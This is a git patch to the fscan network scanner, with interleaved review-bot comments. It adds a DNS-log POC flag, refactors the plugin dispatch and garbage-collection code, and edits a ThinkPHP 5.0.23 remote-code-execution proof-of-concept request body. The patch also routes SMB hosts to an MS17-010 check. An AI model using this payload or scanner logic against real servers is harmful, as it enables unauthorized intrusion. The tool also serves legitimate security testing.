From 98569648bb33d5b98783e7bddb9193eb5565d255 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BD=B1=E8=88=9E=E8=80=85?=
Date: Tue, 16 Aug 2022 11:18:09 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0-dns=E5=8F=82=E6=95=B0?= =?UTF-8?q?=E5=90=AF=E7=94=A8dnslog=20poc?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Plugins/scanner.go | 51 ++++++++++--------------
 WebScan/lib/check.go | 4 +-
 WebScan/pocs/thinkphp5023-method-rce.yml | 6 +--
 common/config.go | 1 +
 common/flag.go | 9 ++++-
 go.mod | 1 -
 go.sum | 5 +--
 7 files changed, 37 insertions(+), 40 deletions(-)

diff --git a/Plugins/scanner.go b/Plugins/scanner.go
index 567871d..2fc2bdc 100644
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -1,7 +1,6 @@
 package Plugins
 
 import (
-	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
@@ -21,6 +20,8 @@ func Scan(info common.HostInfo) {
 	lib.Inithttp(common.Pocinfo)
 	var ch = make(chan struct{}, common.Threads)
 	var wg = sync.WaitGroup{}
+	web := strconv.Itoa(common.PORTList["web"])
+	ms17010 := strconv.Itoa(common.PORTList["ms17010"])
 	if len(Hosts) > 0 || len(common.HostPort) > 0 {
 		if common.IsPing == false && len(Hosts) > 0 {
 			Hosts = CheckLive(Hosts, common.Ping)
@@ -30,6 +31,7 @@ func Scan(info common.HostInfo) {
 			common.LogWG.Wait()
 			return
 		}
+		common.GC()
 		var AlivePorts []string
 		if common.Scantype == "webonly" {
 			AlivePorts = NoPortScan(Hosts, info.Ports)
@@ -47,6 +49,7 @@ func Scan(info common.HostInfo) {
 			common.HostPort = nil
 			fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
 		}
+		common.GC()
 		var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
 		for _, port := range common.PORTList {
 			severports = append(severports, strconv.Itoa(port))
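Review bot: The `common.GC()` added in the @@ -30 hunk (and again in @@ -47, plus twice in the @@ -56 hunk) forces a full collection and `debug.FreeOSMemory()` on the scan path, which is a stop-the-world pause and a syscall-heavy release of memory, while the `init()` goroutine in common/flag.go already runs the same routine every 10 seconds. If the explicit calls exist to bound resident memory between phases, say so at the first one, e.g. `// release the large host/port slices before the next phase; the 10s collector in common is too slow here`; otherwise the periodic collector alone seems sufficient. Scan starts before this hunk and continues past it.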
@@ -56,31 +59,30 @@ func Scan(info common.HostInfo) {
 			info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
 			if common.Scantype == "all" || common.Scantype == "main" {
 				switch {
-				case info.Ports == "135":
-					AddScan(info.Ports, info, ch, &wg) //findnet
 				case info.Ports == "445":
+					AddScan(ms17010, info, &ch, &wg) //ms17010
 					//AddScan(info.Ports, info, ch, &wg) //smb
-					AddScan("1000001", info, ch, &wg) //ms17010
 					//AddScan("1000002", info, ch, &wg) //smbghost
 				case info.Ports == "9000":
-					AddScan(info.Ports, info, ch, &wg) //fcgiscan
-					AddScan("1000003", info, ch, &wg) //http
+					AddScan(web, info, &ch, &wg) //http
+					AddScan(info.Ports, info, &ch, &wg) //fcgiscan
 				case IsContain(severports, info.Ports):
-					AddScan(info.Ports, info, ch, &wg) //plugins scan
+					AddScan(info.Ports, info, &ch, &wg) //plugins scan
 				default:
-					AddScan("1000003", info, ch, &wg) //webtitle
+					AddScan(web, info, &ch, &wg) //webtitle
 				}
 			} else {
-				port, _ := common.PORTList[common.Scantype]
-				scantype := strconv.Itoa(port)
-				AddScan(scantype, info, ch, &wg)
+				scantype := strconv.Itoa(common.PORTList[common.Scantype])
+				AddScan(scantype, info, &ch, &wg)
 			}
 		}
 	}
+	common.GC()
 	for _, url := range common.Urls {
 		info.Url = url
-		AddScan("1000003", info, ch, &wg)
+		AddScan(web, info, &ch, &wg)
 	}
+	common.GC()
 	wg.Wait()
 	common.LogWG.Wait()
 	close(common.Results)
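Review bot: In the `else` branch, `strconv.Itoa(common.PORTList[common.Scantype])` turns an unrecognised scan type into `"0"`, which is then handed to `AddScan` on every target with no plugin behind it and no message to the user; the replaced `port, _ :=` form had the same blind spot, so the commit does not close it. Because the value is constant for the whole run, resolve it once next to `web`/`ms17010` in the @@ -21 hunk with an ok check, roughly `port, ok := common.PORTList[common.Scantype]` / `if !ok { fmt.Println("[-] unknown scantype:", common.Scantype); return }` (message wording is a constructed example), which also keeps the map lookup out of the per-target loop. Scan begins before this hunk and its closing lines follow it.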
@@ -89,35 +91,26 @@ func Scan(info common.HostInfo) {
 
 var Mutex = &sync.Mutex{}
 
-func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
+func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
+	*ch <- struct{}{}
 	wg.Add(1)
 	go func() {
 		Mutex.Lock()
 		common.Num += 1
 		Mutex.Unlock()
-		ScanFunc(PluginList, scantype, &info)
+		ScanFunc(&scantype, &info)
 		Mutex.Lock()
 		common.End += 1
 		Mutex.Unlock()
-		<-ch
 		wg.Done()
+		<-*ch
 	}()
-	ch <- struct{}{}
 }
 
-func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
-	f := reflect.ValueOf(m[name])
-	if len(infos) != f.Type().NumIn() {
-		err = errors.New("The number of infos is not adapted ")
-		fmt.Println(err.Error())
-		return result, nil
-	}
-	in := make([]reflect.Value, len(infos))
-	for k, info := range infos {
-		in[k] = reflect.ValueOf(info)
-	}
-	result = f.Call(in)
-	return result, nil
+func ScanFunc(name *string, info *common.HostInfo) {
+	f := reflect.ValueOf(PluginList[*name])
+	in := []reflect.Value{reflect.ValueOf(info)}
+	f.Call(in)
 }
 
 func IsContain(items []string, item string) bool {
diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go
index dd071db..fe92be0 100644
--- a/WebScan/lib/check.go
+++ b/WebScan/lib/check.go
@@ -82,7 +82,9 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	for _, item := range p.Set {
 		k, expression := item.Key, item.Value
 		if expression == "newReverse()" {
-			return false, nil, ""
+			if !common.DnsLog {
+				return false, nil, ""
+			}
 			variableMap[k] = newReverse()
 			continue
 		}
diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml
index 0e09b4a..a573fa2 100644
--- a/WebScan/pocs/thinkphp5023-method-rce.yml
+++ b/WebScan/pocs/thinkphp5023-method-rce.yml
@@ -1,6 +1,4 @@
 name: poc-yaml-thinkphp5023-method-rce
-set:
-  rand: randomLowercase(10)
 groups:
   poc1:
   - method: POST
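Review bot: The new `ScanFunc` drops the old arity check and calls `f.Call(in)` on `reflect.ValueOf(PluginList[*name])` with no guard; when `*name` is not a key of `PluginList` (the `PORTList` lookups in the @@ -21 and @@ -56 hunks produce `"0"` on a miss, and nothing visible registers a plugin under that name), `f` is the zero `reflect.Value` and `Call` panics inside the goroutine started by `AddScan`, which takes down the whole process rather than one target. Guard the lookup first: `fn, ok := PluginList[*name]` / `if !ok { return }` / `reflect.ValueOf(fn).Call([]reflect.Value{reflect.ValueOf(info)})`. As a point of style, `ch *chan struct{}` and `name *string` add indirection for no benefit — a channel is already a reference type and `scantype` is a per-call copy — so `ch chan struct{}` and `name string` would read more naturally and avoid the `*ch`/`&ch` noise at every call site.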
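Review bot: The added `if !common.DnsLog { return false, nil, "" }` makes a POC that needs a reverse-DNS callback report "not vulnerable" with a nil error, so a caller cannot distinguish a skipped check from a negative one; executePoc begins and ends outside this hunk, so whether anything upstream records the skip is not visible here. At minimum annotate the branch, `// dnslog POCs are opt-in (-dns); without it this POC is skipped, not negative`, or return a distinct value so the run summary can count skipped POCs. Enabling `-dns` also does not by itself show that `newReverse()` has a usable callback domain — config.go declares `CeyeDomain` alongside the new `DnsLog` — so if that dependency holds, validating it where the flag is parsed would avoid silent failures; worth confirming against newReverse.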
@@ -8,9 +6,9 @@ groups:
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      _method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
+      _method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
     expression: |
-      response.body.bcontains(bytes(rand))
+      response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
   poc2:
   - method: POST
     path: /index.php?s=captcha
diff --git a/common/config.go b/common/config.go
index 1cb5d16..8afdc84 100644
--- a/common/config.go
+++ b/common/config.go
@@ -99,6 +99,7 @@ var (
 )
 
 var (
+	DnsLog bool
 	PocNum int
 	PocFull bool
 	CeyeDomain string
diff --git a/common/flag.go b/common/flag.go
index ccd9eb3..e00480c 100644
--- a/common/flag.go
+++ b/common/flag.go
@@ -10,13 +10,17 @@ import (
 func init() {
 	go func() {
 		for {
-			runtime.GC()
-			debug.FreeOSMemory()
+			GC()
 			time.Sleep(10 * time.Second)
 		}
 	}()
 }
 
+func GC() {
+	runtime.GC()
+	debug.FreeOSMemory()
+}
+
 func Banner() {
 	banner := `
 ___ _
@@ -72,6 +76,7 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
 	flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
 	flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
+	flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc")
 	flag.IntVar(&PocNum, "num", 20, "poc rate")
 	flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
 	flag.Parse()
diff --git a/go.mod b/go.mod
index a6b28d6..767fb90 100644
--- a/go.mod
+++ b/go.mod
@@ -19,7 +19,6 @@ require (
 	golang.org/x/text v0.3.6
 	google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
 	gopkg.in/yaml.v2 v2.4.0
-	gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect
 )
 
 replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3
diff --git a/go.sum b/go.sum
index 4c9fe6c..2df01ac 100644
--- a/go.sum
+++ b/go.sum
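Review bot: The marker in the new `body:` line and the string the new `expression:` checks are deliberately not byte-identical (`%25%25k` sent, `%k` expected), and nothing in the file records that this is what keeps a server that merely echoes the request from matching; a later edit that "fixes" the apparent mismatch would turn the check into a false-positive generator. Add a YAML comment above `body:` such as `# the expected response marker intentionally differs from the request so a reflected body cannot satisfy the check`.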
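Review bot: `GC` is a new exported function with no doc comment, and callers in Plugins/scanner.go now invoke it explicitly between scan phases, so its cost deserves to be stated where it is declared. Suggested comment, following the name-first convention: `// GC forces a full garbage collection and returns freed memory to the OS. It is stop-the-world and relatively expensive; the init loop calls it every 10 seconds and Scan calls it between phases.`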
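Review bot: The help text `"using dnslog poc"` does not say what the flag changes; per the check.go hunk, POCs whose `set:` uses `newReverse()` are skipped entirely unless it is on, which is the fact a user needs. Suggest `flag.BoolVar(&DnsLog, "dns", false, "enable pocs that need a dnslog callback (they are skipped by default)")`. Flag's body starts before this hunk and continues past it.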
@@ -50,8 +50,6 @@ github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7
 github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
 github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
 github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
-github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w=
-github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc=
 github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
 github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
 github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
@@ -255,7 +253,6 @@ golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8U
 golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
-golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
 golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
@@ -331,6 +328,8 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=